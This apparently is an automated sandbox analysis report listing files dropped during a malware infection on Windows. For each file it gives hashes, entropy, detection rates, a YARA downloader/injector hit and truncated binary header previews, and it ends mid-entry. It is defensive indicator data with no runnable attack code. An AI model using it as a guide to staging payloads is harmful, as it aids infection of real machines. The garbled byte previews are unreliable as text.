                                                                                    MD5:1E44FBC26D85C541164EF6FCD3D39196
                                                                                    SHA1:655E036714A3F5D8D52A5B0A90D30D32FC1C39C5
                                                                                    SHA-256:EAF64E95B418E07BA14D4C58C14F1CCEC364F781BA557C8788E0C550D3D624E7
                                                                                    SHA-512:D4B4E2B8DC0DC468ABFA772132885980FCAB561834ED332D632F4884A3A1F0A32D4D8014D76AC351D76A105A61080235A931D8C3241ADDCFFE184991AE39107F
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1903015" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                    Process:C:\Users\user\AppData\Local\Temp\D8D3.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                    Category:dropped
                                                                                    Size (bytes):49152
                                                                                    Entropy (8bit):0.7876734657715041
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                    MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                    SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                    SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                    SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\D8D3.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                    Category:dropped
                                                                                    Size (bytes):94208
                                                                                    Entropy (8bit):1.2882898331044472
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                    MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                    SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                    SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                    SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\D8D3.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                    Category:dropped
                                                                                    Size (bytes):94208
                                                                                    Entropy (8bit):1.2882898331044472
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                    MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                    SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                    SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                    SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\D8D3.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
                                                                                    Category:dropped
                                                                                    Size (bytes):28672
                                                                                    Entropy (8bit):1.4755077381471955
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                                                    MD5:DEE86123FE48584BA0CE07793E703560
                                                                                    SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                                                    SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                                                    SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\D8D3.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):684984
                                                                                    Entropy (8bit):6.857030838615762
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:0oUg2twzqWC4kBNv1pMByWk6TYnhCevOEH07OqHM65BaFBuY3NUNeCLIV/Rqnhab:0oUg2tJWC44WUuY3mMCLA/R+hw
                                                                                    MD5:15B61E4A910C172B25FB7D8CCB92F754
                                                                                    SHA1:5D9E319C7D47EB6D31AAED27707FE27A1665031C
                                                                                    SHA-256:B2AE93D30C8BEB0B26F03D4A8325AC89B92A299E8F853E5CAA51BB32575B06C6
                                                                                    SHA-512:7C1C982A2B597B665F45024A42E343A0A07A6167F77EE428A203F23BE94B5F225E22A270D1A41B655F3173369F27991770722D765774627229B6B1BBE2A6DC3F
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Reputation:unknown
                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...&.9b.........."!.........6...........................................................@A........................4,..S....,..........x............T..........8$...&...............................0..................D............................text............................... ..`.rdata.......0......................@..@.data...<F...@.......&..............@....00cfg...............(..............@..@.rsrc...x............*..............@..@.reloc..8$.......&..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\D8D3.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):627128
                                                                                    Entropy (8bit):6.792651884784197
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:dfsiG5KNZea77VUHQqROmbIDm0ICRfCtbtEE/2OH9E2ARlZYSd:df53NZea3V+QqROmum0nRKx79E2ARlrd
                                                                                    MD5:F07D9977430E762B563EAADC2B94BBFA
                                                                                    SHA1:DA0A05B2B8D269FB73558DFCF0ED5C167F6D3877
                                                                                    SHA-256:4191FAF7E5EB105A0F4C5C6ED3E9E9C71014E8AA39BBEE313BC92D1411E9E862
                                                                                    SHA-512:6AFD512E4099643BBA3FC7700DD72744156B78B7BDA10263BA1F8571D1E282133A433215A9222A7799F9824F244A2BC80C2816A62DE1497017A4B26D562B7EAF
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Reputation:unknown
                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....9b.........."!.........V......./....................................................@A............................cQ......,....p...............r..........4C...........................W......h0...............................................text............................... ..`.rdata.......0......................@..@.data........0......................@....00cfg.......P....... ..............@..@.tls.........`......."..............@....rsrc........p.......$..............@..@.reloc..4C.......D..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\D8D3.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):449280
                                                                                    Entropy (8bit):6.670243582402913
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:UEPa9C9VbL+3Omy5CvyOvzeOKaqhUgiW6QR7t5s03Ooc8dHkC2esGgW8g:UEPa90Vbky5CvyUeOKg03Ooc8dHkC2ed
                                                                                    MD5:1FB93933FD087215A3C7B0800E6BB703
                                                                                    SHA1:A78232C352ED06CEDD7CA5CD5CB60E61EF8D86FB
                                                                                    SHA-256:2DB7FD3C9C3C4B67F2D50A5A50E8C69154DC859780DD487C28A4E6ED1AF90D01
                                                                                    SHA-512:79CD448E44B5607863B3CD0F9C8E1310F7E340559495589C428A24A4AC49BEB06502D787824097BB959A1C9CB80672630DAC19A405468A0B64DB5EBD6493590E
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Reputation:unknown
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L....(.[.........."!.....(..........`........@............................................@A.........................g.......r...........................?.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\D8D3.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):2042296
                                                                                    Entropy (8bit):6.775178510549486
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:6dvFywfzFAF7fg39IwA49Kap9bGt+qoStYnOsbqbeQom7gN7BpDD5SkIN1g5D92+:pptximYfpx8OwNiVG09
                                                                                    MD5:F67D08E8C02574CBC2F1122C53BFB976
                                                                                    SHA1:6522992957E7E4D074947CAD63189F308A80FCF2
                                                                                    SHA-256:C65B7AFB05EE2B2687E6280594019068C3D3829182DFE8604CE4ADF2116CC46E
                                                                                    SHA-512:2E9D0A211D2B085514F181852FAE6E7CA6AED4D29F396348BEDB59C556E39621810A9A74671566A49E126EC73A60D0F781FA9085EB407DF1EEFD942C18853BE5
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Reputation:unknown
                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....9b.........."!.........&...............................................`............@A.........................!..\...T...@....@..x....................P..h...h...................................................\....!..@....................text...i........................... ..`.rdata..............................@..@.data....N.......*..................@....00cfg.......0......................@..@.rsrc...x....@......................@..@.reloc..h....P......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\D8D3.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):254392
                                                                                    Entropy (8bit):6.686038834818694
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:uI7A8DMhFE2PlKOcpHSvV6x/CHQyhvs277H0mhWGzTdtb2bbIFxW7zrM2ruyYz+h:uI7A8DMhFE2PlbcpSv0x/CJVUmhDzTvS
                                                                                    MD5:63A1FE06BE877497C4C2017CA0303537
                                                                                    SHA1:F4F9CBD7066AFB86877BB79C3D23EDDACA15F5A0
                                                                                    SHA-256:44BE3153C15C2D18F49674A092C135D3482FB89B77A1B2063D01D02985555FE0
                                                                                    SHA-512:0475EDC7DFBE8660E27D93B7B8B5162043F1F8052AB28C87E23A6DAF9A5CB93D0D7888B6E57504B1F2359B34C487D9F02D85A34A7F17C04188318BB8E89126BF
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Reputation:unknown
                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...'.9b.........."!......................................................................@A........................tv..S....w...................................5..hq..............................................D{...............................text...V........................... ..`.rdata..............................@..@.data................~..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\D8D3.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):1099223
                                                                                    Entropy (8bit):6.502588297211263
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:9jxwSkSteuT4P/y7HjsXAGJyGvN5z4Rui2IXLbO:9Vww8HyrjsvyWN54RZH+
                                                                                    MD5:DBF4F8DCEFB8056DC6BAE4B67FF810CE
                                                                                    SHA1:BBAC1DD8A07C6069415C04B62747D794736D0689
                                                                                    SHA-256:47B64311719000FA8C432165A0FDCDFED735D5B54977B052DE915B1CBBBF9D68
                                                                                    SHA-512:B572CA2F2E4A5CC93E4FCC7A18C0AE6DF888AA4C55BC7DA591E316927A4B5CFCBDDA6E60018950BE891FF3B26F470CC5CCE34D217C2D35074322AB84C32A25D1
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Reputation:unknown
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...".,b.v.........!......................... .....a......................................... .........................n*................................... ...;...................................................................................text...............................`.P`.data...|'... ...(..................@.`..rdata...D...P...F...:..............@.`@.bss....(.............................`..edata..n*.......,..................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...............................@.0..reloc...;... ...<..................@.0B/4......8....`......................@.@B/19.....R....p......................@..B/31.....]'...@...(..................@..B/45......-...p......................@..B/57.....\............&..............@.0B/70.....#............2..
                                                                                    Process:C:\Users\user\AppData\Local\Temp\D8D3.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):80128
                                                                                    Entropy (8bit):6.906674531653877
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:l9j/j2886xv555et/MCsjw0BuRK3jteopUecbAdz86B+JfBL+eNv:l9j/j28V55At/zqw+IqLUecbAdz8lJrv
                                                                                    MD5:1B171F9A428C44ACF85F89989007C328
                                                                                    SHA1:6F25A874D6CBF8158CB7C491DCEDAA81CEAEBBAE
                                                                                    SHA-256:9D02E952396BDFF3ABFE5654E07B7A713C84268A225E11ED9A3BF338ED1E424C
                                                                                    SHA-512:99A06770EEA07F36ABC4AE0CECB2AE13C3ACB362B38B731C3BAED045BF76EA6B61EFE4089CD2EFAC27701E9443388322365BDB039CD388987B24D4A43C973BD1
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Reputation:unknown
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L....(.[.........."!.........................................................0......t(....@A.............................................................?... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\3046.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):722944
                                                                                    Entropy (8bit):7.843693287624674
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:zUJFDhiQSO/bmqK1NIK6kxk7q4p/dn57k/x4omG1ZQHdt1AaQf8O:zQF0Qn6qQoTLdH76x1R1Z4AaQL
                                                                                    MD5:46909DA148DE57B2D85591626AEDBD76
                                                                                    SHA1:8000C3D7B0B33EAA538F8B0E09EFF0559AF06287
                                                                                    SHA-256:0CA1867B6E512A1E78D8A00CECF4FDC09B665B31F9AF122C78EE4A1E5DE5A692
                                                                                    SHA-512:C3A4C1392E9300C5A9255A8BEC4757D8244023F5353D693A9E7A1496DA92F1B90482F9201035AB07B669C228F8BEDBE467F5C54BFB8F4D50C90350B0F2076603
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 62%
                                                                                    Reputation:unknown
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Qn..Qn..Qn..O<..Mn..O<i..n..v...Vn..Qn...n..O<n.}n..O<~.Pn..O<{.Pn..RichQn..................PE..L......a.....................6......fy............@.................................B...........................................P...............................D...P................................?..@............................................text............................... ..`.data...0........*..................@....rsrc............ ..................@..@.reloc...,..........................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\A33B.exe
                                                                                    File Type:CSV text
                                                                                    Category:dropped
                                                                                    Size (bytes):425
                                                                                    Entropy (8bit):5.340009400190196
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks2wKDE4KhK3VZ9pKhk
                                                                                    MD5:CC144808DBAF00E03294347EADC8E779
                                                                                    SHA1:A3434FC71BA82B7512C813840427C687ADDB5AEA
                                                                                    SHA-256:3FC7B9771439E777A8F8B8579DD499F3EB90859AD30EFD8A765F341403FC7101
                                                                                    SHA-512:A4F9EB98200BCAF388F89AABAF7EA57661473687265597B13192C24F06638C6339A3BD581DF4E002F26EE1BA09410F6A2BBDB4DA0CD40B59D63A09BAA1AADD3D
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):984
                                                                                    Entropy (8bit):5.227423502376633
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:Yq6CUXyhm5IUmtQlbNdB6hm5VUmtQlz0Jahm5SUmtQlHZ6T06Mhm5vUmtQlbxdB8:YqDUXycIwbNdUcpwz0JacWwHZ6T06Mcb
                                                                                    MD5:D9512E54D33D06E68E0C0D36726F7776
                                                                                    SHA1:2E2ED852C188E0F96FCF861D7B73B8C479379845
                                                                                    SHA-256:C70B840F192B885EF63C8426B0667EF175424A96DEC79A988C9525AD8E6997D2
                                                                                    SHA-512:AAFCD49F2C87D4D43076CB4C1357FFAC9AB224ADBD4CEB06961755A0D6305D550090DDA34CAAA3C9B2700EF182CC9D6000BAB87A1A31D15A6A9F7565F60BA515
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview:{"RecentItems":[{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":2360844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2350844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":2340844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":2330844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2320844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.Getstarted_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2310844864,"LastSwitchedHighPart":30747916,"PrePopulated":true}]}
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):254464
                                                                                    Entropy (8bit):7.32436195105757
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:LRvnO9N2bPgOyL/dnBYWZf354wHGXobm/JRO0LDl8ABIx8VM6Q3DTNJ3nJWPfo3:1vnptyLFBYkmXF/DHFJw8VM93DDEPfo
                                                                                    MD5:38E67B1288479162D6BC93EE31A90564
                                                                                    SHA1:3457AE59AC2FDCF4B2013B4245EBEBFD22841196
                                                                                    SHA-256:A2AE21D0E3746DD06AC2B1C69517DF60E3998D4D3DB47D655B1C01504BBA21AA
                                                                                    SHA-512:76B931CE148CC722412C454ADAD5A22FE295E6A879E6491658E274D06FA46557810EB34285CD48537D749E0F819E8D9134F903C132A55592006DE2F44505E72B
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    Reputation:unknown
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................B.s.....p.....f..............w...a.....q.....t....Rich...........PE..L......b............................_r............@........................................................................\...P....p..............................@...............................p9..@............................................text............................... ..`.data...............................@....rsrc........p... ..................@..@.reloc...'.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):722944
                                                                                    Entropy (8bit):7.843693287624674
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:zUJFDhiQSO/bmqK1NIK6kxk7q4p/dn57k/x4omG1ZQHdt1AaQf8O:zQF0Qn6qQoTLdH76x1R1Z4AaQL
                                                                                    MD5:46909DA148DE57B2D85591626AEDBD76
                                                                                    SHA1:8000C3D7B0B33EAA538F8B0E09EFF0559AF06287
                                                                                    SHA-256:0CA1867B6E512A1E78D8A00CECF4FDC09B665B31F9AF122C78EE4A1E5DE5A692
                                                                                    SHA-512:C3A4C1392E9300C5A9255A8BEC4757D8244023F5353D693A9E7A1496DA92F1B90482F9201035AB07B669C228F8BEDBE467F5C54BFB8F4D50C90350B0F2076603
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 62%
                                                                                    Reputation:unknown
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Qn..Qn..Qn..O<..Mn..O<i..n..v...Vn..Qn...n..O<n.}n..O<~.Pn..O<{.Pn..RichQn..................PE..L......a.....................6......fy............@.................................B...........................................P...............................D...P................................?..@............................................text............................... ..`.data...0........*..................@....rsrc............ ..................@..@.reloc...,..........................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):387584
                                                                                    Entropy (8bit):6.881738348627874
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:x8DLMZy4voyHwQ+CADR/Qe/eEWajEcf4:CQDvfHwQgVQwVEcf
                                                                                    MD5:B141BC58618C537917CC1DA179CBE8AB
                                                                                    SHA1:C76D3F5EEAE9493E41A272A974B5DFEC5F4E4724
                                                                                    SHA-256:FD999E4A07D8B3D95F9D9231FD496B0125B56094F1B03DDCA7A7B074C1D8C03E
                                                                                    SHA-512:5C72F63124A394602A36A4F985E33A41E8159F54653F431C270B8F0FA8E13131517C31B497A936D5F5D3D27397F40FC7909EFC4BFD04C01BCCA7F306860C3114
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 82%
                                                                                    Reputation:unknown
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z...z...z...(j..z...({..z...(m..z......z...z...z...(d..z...(z..z...(...z..Rich.z..........PE..L...;..a.............................@............@..................................)..........................................<........a..........................................................h,..@...............l............................text............................... ..`.data...@...........................@....guno................N..............@..@.jofolo.F............R..............@..@.nabog...............l..............@..@.rsrc....a.......b...p..............@..@.reloc.."...........................@..B........................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):3657728
                                                                                    Entropy (8bit):7.795668090342615
                                                                                    Encrypted:false
                                                                                    SSDEEP:98304:8gleOA+U9OYPQAY0YdNa1rcO7B9elk44MRTVkVu:tleOA+oDP20YdNa1IM90YMRTm
                                                                                    MD5:81A0ECC23B44DA5116D397C0A3104A05
                                                                                    SHA1:01EFD55A04010EC4E7197BCAC7EC351BB8E5BF07
                                                                                    SHA-256:3F59D2CF23B45B7F56563E85BF818F827F2607D12661FB438BCF031550EC0EC0
                                                                                    SHA-512:CF0C87B4B5101898A48AB312CD1436E2738762EE74D1D77A29635053A373D5DFF237DA84A17DFE7897C7E99B919325FF8C47238A2FD06DFDB04F3D18F4A97185
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 77%
                                                                                    Reputation:unknown
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...?;.c..........#...................:........@..............................b........... ...................................................-.d.....a......^a............................................8.+.0...@]a.8............................................text...P........................... ..`.rdata..b...........................@..@.data..............................@....pdata...... ......................@..@_RDATA..............................@..@.vmp0... T..........................`..`.vmp1...t.7.. *...7.................`..h.rsrc.........a.......7.............@..@................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):7722496
                                                                                    Entropy (8bit):7.943852397063956
                                                                                    Encrypted:false
                                                                                    SSDEEP:196608:xmnP/F68J3FxrU93Eq3zPgSnbWOGGY7p:Y37RjqjPDbWhGY
                                                                                    MD5:B328ABE938AE81E9382BD6858A6EE77F
                                                                                    SHA1:EDBEBCBBEEDB642D906A5E96A1E76A1FB580A11C
                                                                                    SHA-256:CB354C4E272DE841E4A2CC6D96C88C291A720487637EFF8075F6725896137DED
                                                                                    SHA-512:5D9A58ACA575F68D872A7C9643207636CBE0E8B86644971C1E36DC1707A9694F5D5F2B32BD10565CB0EC27FB616A0D6B51EC5E602D86B3DCC538CCA80BE6E845
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\A33B.exe, Author: ditekSHen
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    Reputation:unknown
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..c..................u...........u.. ....v...@.. .......................@v...........@.................................H.u.S.....v...................... v...................................................... ............... ..H............text.....u.. ....u................. ..`.rsrc.........v.......u.............@..@.reloc....... v.......u.............@..B..................u.....H.........u.\............'....u..........................................0.._.......~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.~.... ....Z(....~....,.r...pr...p.(....&..8....~.....o.....~.....o.....~.....o.....~.....o.......(......~....,...(......~....r...p(....,.(....r...po......(......+)~....r1..p(....,...(....r...po....(..........(....(..........(.......(......X..~....o....?....~....&*..0../........s.....s.......s.......o.......,
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):200192
                                                                                    Entropy (8bit):7.034764103148747
                                                                                    Encrypted:false
